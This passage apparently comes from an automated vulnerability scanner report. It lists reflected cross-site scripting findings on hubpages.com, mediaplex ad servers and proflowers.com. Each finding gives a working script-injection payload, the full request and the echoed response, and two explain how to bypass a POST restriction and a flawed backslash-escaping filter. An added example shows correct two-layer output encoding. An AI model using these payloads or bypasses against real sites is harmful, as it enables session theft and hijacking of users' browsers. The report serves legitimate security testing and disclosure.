Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.3.10.1297448193; ru=%2Fmy%2Fhubs%2Fstats; rutxt=view%20your%20account%20settings.

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Feb 2011 18:18:02 GMT
Content-Type: text/html
Connection: keep-alive
Vary: X-Forwarded-Proto,Accept-Encoding
Cache-Control: no-cache
Content-Length: 5694

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/signinc9430"><script>alert(1)</script>d04be060a2d/reset/', 'Page not found'); return false;">
...[SNIP]...

1.103. https://hubpages.com/signin/reset/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   https://hubpages.com
Path:   /signin/reset/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61b00"><script>alert(1)</script>db9cbd8e43 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /signin/reset61b00"><script>alert(1)</script>db9cbd8e43/ HTTP/1.1
Host: hubpages.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.3.10.1297448193; ru=%2Fmy%2Fhubs%2Fstats; rutxt=view%20your%20account%20settings.

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Feb 2011 18:18:08 GMT
Content-Type: text/html
Connection: keep-alive
Vary: X-Forwarded-Proto,Accept-Encoding
Cache-Control: no-cache
Content-Length: 5693

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/signin/reset61b00"><script>alert(1)</script>db9cbd8e43/', 'Page not found'); return false;">
...[SNIP]...

1.104. https://hubpages.com/signin/reset/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   https://hubpages.com
Path:   /signin/reset/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40bce"><script>alert(1)</script>e3e68d52e9c6e238a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; it was possible to convert it to a GET request, which makes the attack easier to demonstrate and deliver (a single link rather than a form submission).

Request

GET /signin/reset40bce"><script>alert(1)</script>e3e68d52e9c6e238a/?email= HTTP/1.1
Host: hubpages.com
Connection: keep-alive
Referer: https://hubpages.com/signin/reset/
Cache-Control: max-age=0
Origin: https://hubpages.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.3.10.1297448193; ru=%2Fmy%2Fhubs%2Fstats; rutxt=view%20your%20account%20settings.

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Feb 2011 18:18:29 GMT
Content-Type: text/html
Connection: keep-alive
Vary: X-Forwarded-Proto,Accept-Encoding
Cache-Control: no-cache
Content-Length: 5707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/signin/reset40bce"><script>alert(1)</script>e3e68d52e9c6e238a/?email=', 'Page not found'); return false;">
...[SNIP]...

1.105. https://hubpages.com/signin/reset/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://hubpages.com
Path:   /signin/reset/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3ca6"><script>alert(1)</script>e2a9419b373 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /signin/reset/?a3ca6"><script>alert(1)</script>e2a9419b373=1 HTTP/1.1
Host: hubpages.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.3.10.1297448193; ru=%2Fmy%2Fhubs%2Fstats; rutxt=view%20your%20account%20settings.

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:17:59 GMT
Content-Type: text/html
Connection: keep-alive
Vary: X-Forwarded-Proto,Accept-Encoding
Cache-Control: no-cache
Content-Length: 5779

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/signin/reset/?a3ca6"><script>alert(1)</script>e2a9419b373=1', 'Reset Your HubPages Password'); return false;">
...[SNIP]...
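
The three hubpages findings above share one sink: the request path is dropped into onclick="showLinkArticle('...', '...')", a single-quoted JavaScript string nested inside a double-quoted HTML attribute, and a " in the input closes the attribute so a new <script> tag can follow. The block below is an added example, not code from the report or from hubpages.com; showLinkArticle is the function name seen in the responses, while renderLinkVulnerable, renderLinkSafe, jsString, htmlAttr, breaksOutOfAttribute and handlerArgFromHtml are names made up for this illustration. It renders the anchor the vulnerable way and the correct way (encode for the inner JavaScript context first, then for the outer attribute context, the reverse of the order in which the browser decodes) and shows that the safe output still hands the handler the original path.

```javascript
// Added example (not from the report or from hubpages.com): breaking out of
// the nested onclick sink seen in findings 1.103-1.105, and the two-layer
// encoding that confines it. Helper names are this example's own.

// Constructed payload in the shape Burp used (random hex boundary markers).
const PAYLOAD = '/signin/reset61b00"><script>alert(1)</script>db9cbd8e43/';

// Vulnerable rendering: raw path concatenated into a double-quoted HTML
// attribute whose value is JavaScript containing a single-quoted string.
function renderLinkVulnerable(path, title) {
  return `<a href="#" onclick="showLinkArticle('${path}', '${title}'); return false;">`;
}

// Layer 1: encode for a JavaScript string literal (inner context).
// \uXXXX escapes also keep ", <, > and ' away from the HTML parser.
function jsString(s) {
  return s.replace(/[^A-Za-z0-9 ._\-\/]/g,
    c => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

// Layer 2: encode for a double-quoted HTML attribute (outer context).
function htmlAttr(s) {
  return s.replace(/[&"'<>]/g, c => ({
    '&': '&amp;', '"': '&quot;', "'": '&#x27;', '<': '&lt;', '>': '&gt;',
  })[c]);
}

// Safe rendering: inner encoding first, then outer. The browser decodes the
// attribute (HTML) before it parses the handler (JavaScript), so encoding
// is applied in the reverse order.
function renderLinkSafe(path, title) {
  const handler = `showLinkArticle('${jsString(path)}', '${jsString(title)}'); return false;`;
  return `<a href="#" onclick="${htmlAttr(handler)}">`;
}

// Crude stand-in for what the scanner confirms by parsing the response:
// does the onclick value close early and a <script> tag follow it?
function breaksOutOfAttribute(html) {
  const m = /onclick="([^"]*)"/.exec(html);
  if (!m) return true;                 // attribute not even well-formed
  const rest = html.slice(m.index + m[0].length);
  return /<script/i.test(rest);
}

// Undo both layers in the browser's order (HTML, then JavaScript) to show
// the safe encoding is lossless: the handler still receives the real path.
function handlerArgFromHtml(html) {
  const attr = /onclick="([^"]*)"/.exec(html)[1];
  const decodedHtml = attr.replace(/&(amp|quot|#x27|lt|gt);/g, e => ({
    '&amp;': '&', '&quot;': '"', '&#x27;': "'", '&lt;': '<', '&gt;': '>',
  })[e]);
  const arg = /showLinkArticle\('([^']*)'/.exec(decodedHtml)[1];
  return JSON.parse('"' + arg + '"');  // \uXXXX escapes are valid JSON too
}
```

Encoding only the outer layer (HTML attribute) would stop this particular payload but leave the inner JavaScript string open to a ' or \ based breakout; encoding only the inner layer with plain backslashes would leave " for the HTML parser to find. Both layers, in the order shown, are needed for a value that crosses two parsers.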

1.106. http://img.mediaplex.com/content/0/10105/PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby.js [mpck parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/10105/PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e5f65"%3balert(1)//e3cc197dac6 was submitted in the mpck parameter. This input was echoed as e5f65";alert(1)//e3cc197dac6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/10105/PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F10105-118547-2060-6%3Fmpt%3D%5B2065384166ER%5De5f65"%3balert(1)//e3cc197dac6&mpt=[2065384166ER]&mpvc= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo2=12109:6166; mojo3=10105:2060/1551:16084/17339:3601/14302:23636/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113

Response

HTTP/1.1 200 OK
Date: Fri, 11 Feb 2011 18:31:47 GMT
Server: Apache
Last-Modified: Thu, 10 Feb 2011 21:35:49 GMT
ETag: "722e8f-c74-49bf45d733740"
Accept-Ranges: bytes
Content-Length: 4408
Content-Type: application/x-javascript

document.write( "<script type=\"text/javascript\" SRC=\"http://img-cdn.mediaplex.com/0/documentwrite.js\"><"+"/script>");

function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator
...[SNIP]...
<a href=\"http://altfarm.mediaplex.com/ad/ck/10105-118547-2060-6?mpt=[2065384166ER]e5f65";alert(1)//e3cc197dac6\" target=\"_blank\">
...[SNIP]...

1.107. http://img.mediaplex.com/content/0/10105/PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby.js [mpvc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/10105/PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7cf9c"%3balert(1)//3ea9afa3053 was submitted in the mpvc parameter. This input was echoed as 7cf9c";alert(1)//3ea9afa3053 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/10105/PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F10105-118547-2060-6%3Fmpt%3D%5B2065384166ER%5D&mpt=[2065384166ER]&mpvc=7cf9c"%3balert(1)//3ea9afa3053 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo2=12109:6166; mojo3=10105:2060/1551:16084/17339:3601/14302:23636/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113

Response

HTTP/1.1 200 OK
Date: Fri, 11 Feb 2011 18:31:49 GMT
Server: Apache
Last-Modified: Thu, 10 Feb 2011 21:35:49 GMT
ETag: "722e8f-c74-49bf45d733740"
Accept-Ranges: bytes
Content-Length: 4384
Content-Type: application/x-javascript

document.write( "<script type=\"text/javascript\" SRC=\"http://img-cdn.mediaplex.com/0/documentwrite.js\"><"+"/script>");

function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator
...[SNIP]...
<PARAM NAME=\"FlashVars\" VALUE=\"clickTAG=7cf9c";alert(1)//3ea9afa3053http://altfarm.mediaplex.com%2Fad%2Fck%2F10105-118547-2060-6%3Fmpt%3D%5B2065384166ER%5D&clickTag=7cf9c";alert(1)//3ea9afa3053http://altfarm.mediaplex.com%2Fad%2Fck%2F10105-118547-2060-6%3Fmpt%3D%5B2065
...[SNIP]...

1.108. http://img.mediaplex.com/content/0/10105/PF_VDay11_300x250_DODStatus_VSpl_1Dznrr.html [mpck parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/10105/PF_VDay11_300x250_DODStatus_VSpl_1Dznrr.html

Issue detail

The value of the mpck request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a882"><script>alert(1)</script>21df409d40e was submitted in the mpck parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/10105/PF_VDay11_300x250_DODStatus_VSpl_1Dznrr.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F10105-114325-17214-18%3Fmpt%3D51106614a882"><script>alert(1)</script>21df409d40e&mpt=5110661&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3aab/3/0/%2a/h%3B236309877%3B0-0%3B0%3B18273353%3B4307-300/250%3B40601884/40619671/1%3Bu%3D885ae1c570ca4d369ef281e418082327%3B%7Esscs%3D%3f HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.amazon.com/aan/2009-09-09/static/amazon/iframeproxy-2.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo2=12109:6166; mojo3=10105:17214/1551:16084/17339:3601/14302:23636/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113

Response

HTTP/1.1 200 OK
Date: Fri, 11 Feb 2011 18:31:17 GMT
Server: Apache
Last-Modified: Fri, 11 Feb 2011 17:24:55 GMT
ETag: "770d6a-da7-49c04fa00c7c0"
Accept-Ranges: bytes
Content-Length: 6963
Content-Type: text/html; charset=ISO-8859-1

<HTML>
<BODY LEFTMARGIN="0" TOPMARGIN="0" MARGINWIDTH="0" MARGINHEIGHT="0">
<NOSCRIPT>
<a href="http://ad.doubleclick.net/click;h=v8/3aab/3/0/*/h;236309877;0-0;0;18273353;4307-300/250;40601884/40619671/1;u=885ae1c570ca4d369ef281e418082327;~sscs=?http://altfarm.mediaplex.com/ad/ck/10105-114325-17214-18?mpt=51106614a882"><script>alert(1)</script>21df409d40e" TARGET="_blank">
...[SNIP]...

1.109. http://img.mediaplex.com/content/0/10105/PF_VDay11_300x250_DODStatus_VSpl_1Dznrr.html [mpck parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/10105/PF_VDay11_300x250_DODStatus_VSpl_1Dznrr.html

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1df09"%3balert(1)//f3d279bcdd was submitted in the mpck parameter. This input was echoed as 1df09";alert(1)//f3d279bcdd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/10105/PF_VDay11_300x250_DODStatus_VSpl_1Dznrr.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F10105-114325-17214-18%3Fmpt%3D51106611df09"%3balert(1)//f3d279bcdd&mpt=5110661&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3aab/3/0/%2a/h%3B236309877%3B0-0%3B0%3B18273353%3B4307-300/250%3B40601884/40619671/1%3Bu%3D885ae1c570ca4d369ef281e418082327%3B%7Esscs%3D%3f HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.amazon.com/aan/2009-09-09/static/amazon/iframeproxy-2.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo2=12109:6166; mojo3=10105:17214/1551:16084/17339:3601/14302:23636/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113

Response

HTTP/1.1 200 OK
Date: Fri, 11 Feb 2011 18:31:19 GMT
Server: Apache
Last-Modified: Fri, 11 Feb 2011 17:24:55 GMT
ETag: "770d6a-da7-49c04fa00c7c0"
Accept-Ranges: bytes
Content-Length: 6763
Content-Type: text/html; charset=ISO-8859-1

<HTML>
<BODY LEFTMARGIN="0" TOPMARGIN="0" MARGINWIDTH="0" MARGINHEIGHT="0">
<NOSCRIPT>
<a href="http://ad.doubleclick.net/click;h=v8/3aab/3/0/*/h;236309877;0-0;0;18273353;4307-300/250;40601884/4061
...[SNIP]...
lick.net/click;h=v8/3aab/3/0/*/h;236309877;0-0;0;18273353;4307-300/250;40601884/40619671/1;u=885ae1c570ca4d369ef281e418082327;~sscs=?http://altfarm.mediaplex.com/ad/ck/10105-114325-17214-18?mpt=51106611df09";alert(1)//f3d279bcdd\" target=\"_blank\">
...[SNIP]...

1.110. http://img.mediaplex.com/content/0/10105/PF_VDay11_300x250_DODStatus_VSpl_1Dznrr.html [mpvc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/10105/PF_VDay11_300x250_DODStatus_VSpl_1Dznrr.html

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3e06b"%3balert(1)//0812ffa0161 was submitted in the mpvc parameter. This input was echoed as 3e06b";alert(1)//0812ffa0161 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/10105/PF_VDay11_300x250_DODStatus_VSpl_1Dznrr.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F10105-114325-17214-18%3Fmpt%3D5110661&mpt=5110661&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3aab/3/0/%2a/h%3B236309877%3B0-0%3B0%3B18273353%3B4307-300/250%3B40601884/40619671/1%3Bu%3D885ae1c570ca4d369ef281e418082327%3B%7Esscs%3D%3f3e06b"%3balert(1)//0812ffa0161 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.amazon.com/aan/2009-09-09/static/amazon/iframeproxy-2.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo2=12109:6166; mojo3=10105:17214/1551:16084/17339:3601/14302:23636/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113

Response

HTTP/1.1 200 OK
Date: Fri, 11 Feb 2011 18:31:24 GMT
Server: Apache
Last-Modified: Fri, 11 Feb 2011 17:24:55 GMT
ETag: "770d6a-da7-49c04fa00c7c0"
Accept-Ranges: bytes
Content-Length: 6753
Content-Type: text/html; charset=ISO-8859-1

<HTML>
<BODY LEFTMARGIN="0" TOPMARGIN="0" MARGINWIDTH="0" MARGINHEIGHT="0">
<NOSCRIPT>
<a href="http://ad.doubleclick.net/click;h=v8/3aab/3/0/*/h;236309877;0-0;0;18273353;4307-300/250;40601884/4061
...[SNIP]...
<PARAM NAME=\"FlashVars\" VALUE=\"clickTAG=http://ad.doubleclick.net/click;h=v8/3aab/3/0/*/h;236309877;0-0;0;18273353;4307-300/250;40601884/40619671/1;u=885ae1c570ca4d369ef281e418082327;~sscs=?3e06b";alert(1)//0812ffa0161http://altfarm.mediaplex.com%2Fad%2Fck%2F10105-114325-17214-18%3Fmpt%3D5110661&clickTag=http://ad.doubleclick.net/click;h=v8/3aab/3/0/*/h;236309877;0-0;0;18273353;4307-300/250;40601884/40619671/1;u=885
...[SNIP]...

1.111. http://img.mediaplex.com/content/0/10105/PF_VDay11_300x250_DODStatus_VSpl_1Dznrr.html [mpvc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/10105/PF_VDay11_300x250_DODStatus_VSpl_1Dznrr.html

Issue detail

The value of the mpvc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d82a0"><script>alert(1)</script>4476f6b8c89 was submitted in the mpvc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/10105/PF_VDay11_300x250_DODStatus_VSpl_1Dznrr.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F10105-114325-17214-18%3Fmpt%3D5110661&mpt=5110661&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3aab/3/0/%2a/h%3B236309877%3B0-0%3B0%3B18273353%3B4307-300/250%3B40601884/40619671/1%3Bu%3D885ae1c570ca4d369ef281e418082327%3B%7Esscs%3D%3fd82a0"><script>alert(1)</script>4476f6b8c89 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.amazon.com/aan/2009-09-09/static/amazon/iframeproxy-2.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo2=12109:6166; mojo3=10105:17214/1551:16084/17339:3601/14302:23636/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113

Response

HTTP/1.1 200 OK
Date: Fri, 11 Feb 2011 18:31:21 GMT
Server: Apache
Last-Modified: Fri, 11 Feb 2011 17:24:55 GMT
ETag: "770d6a-da7-49c04fa00c7c0"
Accept-Ranges: bytes
Content-Length: 6963
Content-Type: text/html; charset=ISO-8859-1

<HTML>
<BODY LEFTMARGIN="0" TOPMARGIN="0" MARGINWIDTH="0" MARGINHEIGHT="0">
<NOSCRIPT>
<a href="http://ad.doubleclick.net/click;h=v8/3aab/3/0/*/h;236309877;0-0;0;18273353;4307-300/250;40601884/40619671/1;u=885ae1c570ca4d369ef281e418082327;~sscs=?d82a0"><script>alert(1)</script>4476f6b8c89http://altfarm.mediaplex.com/ad/ck/10105-114325-17214-18?mpt=5110661" TARGET="_blank">
...[SNIP]...

1.112. http://products.proflowers.com/flowers/18-Red-Roses-30050119 [ref parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/18-Red-Roses-30050119

Issue detail

The value of the ref request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload efbdf\"%3balert(1)//5e820bfb5e was submitted in the ref parameter. This input was echoed as efbdf\\";alert(1)//5e820bfb5e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Request

GET /flowers/18-Red-Roses-30050119?viewpos=2&trackingpgroup=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rrefbdf\"%3balert(1)//5e820bfb5e HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=xsbbevdz1a3ssdqbzxeccj03; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,pfb-3,phl-2,pjt-4,pju-4,pbp-3,pjv-5,psb-4,pvo-1,pmt-2,xpb-1,pvm-1,poe-3,zzc-2,pjs-4,pcu-1,pfl-3,prf-3,pec-1,mpsmediapersonalitysplit-2,ntd-1,pbo-2,nte-2,ntc-2,ppv-2,pfp-3,phr-1,zza-1,psv-4,nta-2,pbl-1,ntb-2,pmo-1,ppr-2,prl-4,xpc-1,psr-2,pbr-3,pcy-7,zzb-1,gfr-1,apg-1,ppe-1,pcb-1; ENDOFDAY_PFC=TestAssignmentValues=; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=2/11/2011 10:32:14 AM; PRVD=SiteSplitID=72; PFC_BrowserId=41f9dda9-9db3-4eb3-80d0-0479607be84f; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; s_cc=true; s_vi=[CS]v1|26AAC068051481C2-6000018C8039CEE6[CE]; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX; s_sq=proflodevelopment%3D%2526pid%253Dpfc%25253ALanding%25253APortals%25253AHIC%2526pidt%253D1%2526oid%253Dhttp%25253A//products.proflowers.com/flowers/18-Red-Roses-30050119%25253Fviewpos%25253D2%252526trackingpgroup%25253DHIC%252526ref%25253Dfgvprt%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=xsbbevdz1a3ssdqbzxeccj03; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=xsbbevdz1a3ssdqbzxeccj03; path=/; HttpOnly
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:40:42 AM; domain=.proflowers.com; expires=Thu, 12-May-2011 17:40:42 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 11 Feb 2011 18:40:43 GMT
Content-Length: 169473


<noscript>
<div class="splashBox">
   <p>We're Sorry - </p>
